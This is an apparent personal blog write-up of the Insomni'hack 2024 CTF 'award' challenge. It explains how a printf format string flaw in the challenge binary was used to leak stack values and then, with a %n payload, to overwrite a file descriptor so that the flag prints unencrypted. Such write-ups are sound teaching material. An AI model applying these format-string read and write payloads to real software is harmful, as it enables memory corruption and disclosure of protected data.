Insomni'hack 2024 - Award Challenge
As I haven't posted for a long time and have now participated in the Insomni'hack 2024 CTF, I thought I would write about the challenge "award", which I found quite interesting. After solving another, easier challenge, I spent pretty much the entire night of the CTF on it, but only finished the next day, when the CTF was already over.
The challenge provided a binary. If you want to follow along, you can find the binary here (encoded as base64 with added line breaks). Additionally, an nc command was given to connect to the remote instance, so the binary was only for analyzing what runs on the remote side.
The analysis and decompilation of the binary can easily be done in any of the usual tools. I used Binary Ninja, as I have a license for it and it's not that expensive. I spent quite some time setting the right variable names etc.
The decompiled code looks like this:
[Figure: Decompiled code]
Note: There were also stack cookies in the main function added by the compiler, but that code has been removed in the above screenshot, as it is not really relevant for now.
So what does the code do? It sets the standard streams to line buffering, initializes buffers and then asks for user input. It opens the file "flag.txt", which has to be located in the same folder, and /dev/urandom, then echoes the user name back. After that it reads random bytes from /dev/urandom, loads the flag, XORs it with the random data and outputs the result.
If this is to be exploited remotely, then the only way is to find a vulnerability. The username is read with fgets using a correct length value of 32, so there is no buffer overflow. Additionally, the binary uses ASLR, stack cookies and all that fun stuff to prevent or complicate exploitation.
But after a closer look at the code, it turns out that the input text is simply echoed back in line 28 by passing it directly to printf as the format string. That is a format string vulnerability. I've spent tons of time trying to understand the stack layout, looking up gdb commands, setting breakpoints in stripped code and reading the stack memory. My idea was to read the random data using the format string vulnerability and that way be able to decrypt the returned string.
[Figure: Breakpoint on vulnerable printf in gdb]
The stack layout for the variables is as follows:
[Figure: Stack layout]
So we want to inspect some variables by supplying a format string. What took me quite some time to figure out is that on 64-bit Linux the first six integer or pointer arguments are passed in registers, not on the stack. Only arguments beyond the sixth are passed on the stack. This is the "System V AMD64 ABI" calling convention. With the format string being the first argument, we need to waste five arguments before we get anything from the stack. Also, %x, %08x or %016x do not return the full qword from the stack, but only its lower dword, because %x reads an unsigned int regardless of the field width. %p returns the full qword (a length modifier as in %lx would too, at the cost of one more character per value). The value is printed as a number, so its bytes appear reversed compared to their order in memory (as x86 is little endian).
[Figure: Data read from stack]
In the screenshot of gdb above, we can see the input name %i%i%i%i%i to waste five parameters, then a separator ':', followed by several %p to output the stack content. We can confirm the content by looking at the stack in gdb.
[Figure: Stack dump in gdb]
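The leak input described above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the helper names are made up, the 31-character limit comes from the fgets length of 32, and the sample qword is an arbitrary value chosen to show what %x would cut off.

```python
# Hypothetical helpers, not part of the challenge or of any exploit library.
REGISTER_ARGS_AFTER_FORMAT = 5  # rsi, rdx, rcx, r8, r9 (rdi holds the format string)
MAX_INPUT_CHARS = 31            # fgets with size 32 keeps at most 31 characters


def build_leak_payload(stack_qwords: int) -> str:
    """Skip the register arguments with %i, then print stack qwords with %p."""
    payload = "%i" * REGISTER_ARGS_AFTER_FORMAT + ":" + "%p" * stack_qwords
    if len(payload) > MAX_INPUT_CHARS:
        raise ValueError("payload does not fit into the username buffer")
    return payload


def low_dword(qword: int) -> int:
    """What %x would show: only the lower 32 bits of the 64-bit slot."""
    return qword & 0xFFFFFFFF


print(build_leak_payload(4))                 # %i%i%i%i%i:%p%p%p%p
print(hex(low_dword(0x1122334455667788)))    # 0x55667788 (made-up sample value)
```

With this layout at most ten %p fit into the input, since 10 + 1 + 2 * 10 = 31 characters.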
So we can confirm that we can successfully read the stack. Only the format of the output is a bit different, but the data can be fully read, up to what fits into the limited input string (max. 31 characters plus terminating null byte). In the output string each %p value starts with the prefix 0x and there is no other separator, so note that the '0' before each 'x' belongs to the prefix and not to the preceding number. Also, %p prints each qword as a number, so its bytes appear reversed compared to memory (little endianness), while the gdb dump groups the same memory by dword, so each dword is reversed individually rather than the qword as a whole. For example, the first output of %p is 0x4656d6f68 (not ...6f680!) and this corresponds to the two dword values 0x656d6f68 and 0x00000004. The '4' is the value in fd_rnd by the way.
This is also the point where we realize that at the time of the printf statement, there is no useful data on the stack yet. Neither the flag nor the random bytes have been read yet. So new ideas are needed.
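To make the byte order less confusing, here is a small Python sketch that turns the %p output back into memory order. The function names are made up for illustration, and the second value in the sample run is a hypothetical address; only 0x4656d6f68 is taken from the output above.

```python
import struct


def parse_pointer_run(text: str) -> list:
    """Split back-to-back %p outputs such as '0x10x2' into integers.

    Hex digits never contain 'x', so splitting on the '0x' prefix is safe.
    """
    return [int(part, 16) for part in text.split("0x") if part]


def memory_bytes(qword: int) -> bytes:
    """Bytes as they lie in memory on little-endian x86-64."""
    return struct.pack("<Q", qword)


def dwords(qword: int) -> tuple:
    """Lower and upper dword, as shown in a dword-wise gdb dump."""
    return qword & 0xFFFFFFFF, qword >> 32


values = parse_pointer_run("0x4656d6f680x7ffc00001234")  # second value is made up
print([hex(v) for v in values])   # ['0x4656d6f68', '0x7ffc00001234']
print(memory_bytes(values[0]))    # b'home\x04\x00\x00\x00'
print([hex(d) for d in dwords(values[0])])  # ['0x656d6f68', '0x4']
```

Note that glibc prints a null pointer as (nil) instead of 0x0, which this sketch does not handle.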
As we cannot read anything, the only solution must be to write data.
Going through the original format string vulnerability document from 2001 again, we can see that probably the only way to write useful data is to use the %n conversion.
[Figure: What is %n]
In the screenshot above (from the website educative.io), we can see how this works: %n prints nothing, but stores the number of bytes written so far into the int variable that the corresponding pointer argument points to. So there must be some pointer on the stack that points to a variable we can overwrite. Looking at the stack dump from above, we can see that in the second line on the right side there is some pointer. Looking it up in the stack layout diagram, this is the ptr_fd_rnd pointer. This means we can overwrite the fd_rnd file descriptor.
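The effect of %n can be illustrated with a toy model in Python. This is not how libc is implemented; it is a minimal sketch that supports only %i, %p and %n, models memory as a dictionary, and uses made-up addresses and values.

```python
def toy_printf(fmt: str, args: list, memory: dict) -> str:
    """Toy model of printf supporting only %i, %p and %n (not real libc code)."""
    output = []
    written = 0             # bytes emitted so far, which is what %n stores
    remaining = iter(args)  # arguments are consumed strictly left to right
    pos = 0
    while pos < len(fmt):
        if fmt[pos] != "%":
            output.append(fmt[pos])
            written += 1
            pos += 1
            continue
        if pos + 1 >= len(fmt):
            raise ValueError("incomplete conversion at end of format string")
        spec = fmt[pos + 1]
        arg = next(remaining)
        if spec == "n":
            # %n prints nothing: the argument is treated as a pointer and
            # the running byte count is stored at that address.
            memory[arg] = written
        elif spec in ("i", "p"):
            text = str(arg) if spec == "i" else hex(arg)
            output.append(text)
            written += len(text)
        else:
            raise ValueError(f"unsupported conversion %{spec}")
        pos += 2
    return "".join(output)


FD_ADDRESS = 0x1000            # hypothetical address of fd_rnd
memory = {FD_ADDRESS: 4}       # fd_rnd holds file descriptor 4 before the call
printed = toy_printf("%i%p%n", [7, 0xBEEF, FD_ADDRESS], memory)
print(printed)                 # 70xbeef
print(memory[FD_ADDRESS])      # 7
```

The stored value is just the length of everything printed before the %n, which is why it is hard to choose freely with a short input.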
So what can we do when we overwrite the file descriptor for the random data generator? We could overwrite it with another file descriptor, for example with stdin, but that gets a bit tricky, as we cannot easily control the value written and would need multiple writes. But we can certainly overwrite it with an invalid file descriptor.
Looking at the decompiled code again, we can see the following:
- Line 27 creates this pointer on the stack, which was conveniently placed there for us, as we can use that for exploitation. The pointer is not used otherwise.
- Line 29 reads data from the /dev/urandom device. The return value is stored, but never used or checked.
This means that if we overwrite the fd_rnd file descriptor with an invalid value, the read function fails and leaves buf_rnd filled with zeroes. The XOR then changes nothing, so the output is the clear-text flag instead of the XOR-encrypted one.
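Why an all-zero buffer helps can be checked quickly in Python. This is a minimal sketch: xor_encode is a made-up stand-in for the loop in the binary, and the flag string is a placeholder, not the real flag.

```python
import os


def xor_encode(data: bytes, key: bytes) -> bytes:
    """XOR every data byte with the key byte at the same position."""
    return bytes(d ^ k for d, k in zip(data, key))


flag = b"INS{placeholder_flag}"     # made-up example, not the real flag

random_key = os.urandom(len(flag))  # what a successful read would provide
zero_key = bytes(len(flag))         # what remains in the buffer if read fails

masked = xor_encode(flag, random_key)
print(xor_encode(masked, random_key) == flag)  # True: XOR with the same key undoes it
print(xor_encode(flag, zero_key) == flag)      # True: XOR with zeroes changes nothing
```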
So the input string is again %i%i%i%i%i to skip the register-based parameters, then three times %p to skip ahead to the ptr_fd_rnd pointer on the stack and then a %n, which consumes ptr_fd_rnd as its argument and therefore writes to the variable fd_rnd.
[Figure: Exploitation]
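Which directive consumes which argument can be spelled out with a short Python sketch. The register order follows the System V AMD64 calling convention; the stack[n] labels and the helper name are made up for illustration, with stack[0] meaning the first qword printf takes from the stack.

```python
# Registers holding the five arguments after the format string (which is in rdi).
REGISTERS = ["rsi", "rdx", "rcx", "r8", "r9"]


def argument_sources(directives: list) -> list:
    """Pair each directive with the register or stack slot it consumes."""
    sources = []
    for index, directive in enumerate(directives):
        if index < len(REGISTERS):
            sources.append((directive, REGISTERS[index]))
        else:
            sources.append((directive, f"stack[{index - len(REGISTERS)}]"))
    return sources


directives = ["%i"] * 5 + ["%p"] * 3 + ["%n"]
payload = "".join(directives)

print(payload, len(payload))       # %i%i%i%i%i%p%p%p%n 18
for directive, source in argument_sources(directives):
    print(directive, "<-", source)  # the last line shows: %n <- stack[3]
```

At 18 characters the input fits comfortably into the 31 characters that fgets accepts.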
We can see in this screenshot the stack before and after the exploitation. The fd_rnd file descriptor is the second value, which changes from 0x4 to 0x38 (the number of bytes printed before the %n). The value 0x38 is not a valid file descriptor. So let's see if this worked.
[Figure: Result of exploitation]
So this successfully returns the unencrypted flag content. The same input would now only have to be sent to the remote server, but that is not available anymore after the CTF is over.
Lessons learned:
- I've known format string vulnerabilities from a theoretical standpoint, but this is the first time actually exploiting one and also using not only the read functionality, but also writing.
- On 64-bit Linux the first six integer or pointer arguments are passed in registers, so this has to be taken into account for anything stack related.
- Reading 64-bit values on a 64-bit system requires %p (or a length modifier as in %lx), as %08x only prints the lower 32 bits.
- Writing to a destination address requires a pointer, which was conveniently placed onto the stack by the challenge creators. As this value was unused, this can be treated as a given hint.
- The stack is read upward (towards higher addresses), starting at the current stack pointer address. As the stack grows towards lower addresses when pushing something to the stack, I thought the first parameter would be at higher addresses. Somehow I also thought that the parameters must be below the current stack pointer, but of course that makes no sense.
- The calling convention that the caller cleans up the stack is quite convenient to exploit this vulnerability, otherwise it would mess up the stack.
Even though I ran into many dead ends and spent way too much time on this, at least I could solve it on my own in the end and learned a lot. It was a fun challenge and helped me better understand format string vulnerabilities.